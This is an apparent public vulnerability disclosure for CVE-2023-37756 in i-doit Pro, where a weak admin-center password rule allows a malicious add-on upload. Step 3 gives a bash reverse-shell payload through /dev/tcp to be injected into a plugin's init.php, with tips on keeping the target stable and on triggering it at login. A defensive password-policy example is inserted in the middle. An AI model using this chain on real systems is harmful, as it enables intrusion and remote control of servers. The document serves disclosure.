leekenghwa / CVE-2023-37756-CWE-521-lead-to-malicious-plugin-upload-in-the-i-doit-Pro-25-and-below


CVE-2023-37756 – Weak Password Requirement in admin-center leads to malicious plugin upload in i-doit Pro 25 and below

i-doit Pro 25 and below are affected by a weak password requirement vulnerability (CWE-521) in the admin-center which, combined with malicious plugin upload, leads to remote code execution. These vulnerabilities allow an attacker to brute force or guess the admin-center password, gain access to the admin-center, and upload a malicious plugin to gain remote code execution.

Description of product: i-doit is a web-based open source IT documentation and CMDB (Configuration Management Database) tool developed by synetics GmbH. i-doit Pro is the commercial version of the software and requires a paid license. It comes with additional features, professional support, and regular updates and enhancements. Users need to purchase a license to use i-doit Pro, and the cost varies based on the number of users and features required.

Description of vulnerability: We found that this web application has a weak password requirement for admin-center account creation: the application owner can set a password as short as one character for the default username “admin”. This makes it easy for an attacker to brute force or guess the password, gain access to the admin-center, and upload a malicious plugin to gain remote code execution.
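As a defender-side illustration of the CWE-521 weakness described above, the following is an added example (not code from the i-doit project or from this advisory) of the server-side password policy check that admin-center account creation should enforce; the minimum length, the character-class rule and the blocklist are assumed values chosen for the example.

```python
import re
import string

# Assumed policy values for this example; a real deployment would tune them.
MIN_LENGTH = 12
# Constructed blocklist of well-known weak passwords, including the one-character
# password accepted by the vulnerable admin-center form.
BLOCKLIST = {"1", "admin", "password", "12345678", "123456789012", "i-doit"}


def check_password(password: str, username: str = "admin") -> list[str]:
    """Return the list of policy violations; an empty list means the password is acceptable."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")

    # Require at least three of the four character classes.
    classes = {
        "lowercase": any(c.islower() for c in password),
        "uppercase": any(c.isupper() for c in password),
        "digit": any(c.isdigit() for c in password),
        "symbol": any(c in string.punctuation for c in password),
    }
    missing = [name for name, present in classes.items() if not present]
    if len(missing) > 1:
        problems.append("needs at least three character classes, missing: " + ", ".join(missing))

    lowered = password.lower()
    if lowered in BLOCKLIST:
        problems.append("is a well-known weak password")
    # The default admin-center account name must not appear inside the password.
    if username and username.lower() in lowered:
        problems.append("contains the account username")
    # Reject strings made of one repeated character, e.g. "111111111111".
    if re.fullmatch(r"(.)\1*", password):
        problems.append("is a single repeated character")
    return problems


def is_acceptable(password: str, username: str = "admin") -> bool:
    """True only when the password passes every rule above."""
    return not check_password(password, username)


if __name__ == "__main__":
    for candidate in ("1", "Administrator#2024xyz", "Adm1n-Str0ng-Passw0rd!"):
        print(repr(candidate), "->", check_password(candidate) or "OK")
```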

Affected Webpage: admin-center login page + plugin install

Affected parameter & component: admin-center login page + plugin install

Step 1: as there is no password requirement and no password complexity implemented in account creation for the admin-center, we can start with brute force. The screenshot below shows a successful login with username “admin” and password “1”.


Step 2: navigate to the Add-on tab and choose upload.


Step 3: there are some requirements, such as a package.json having to exist, and we found that the target runs an async check over every class and function. However, we can download a proper plugin from their customer portal and edit / add to its init.php; this is the safest way to prevent a system crash when the payload is triggered. Note: put & at the end of the line to prevent a system crash after the payload is triggered, and init.php is the best place to inject the payload. Example: exec ("/bin/bash -c 'bash -i >& /dev/tcp/IP/Port 0>&1 &'");


Note: remember to zip it back up and upload it.


Note: click Install, then activate the selected Add-on.


Note: the payload is triggered when someone logs in; it can be any user.
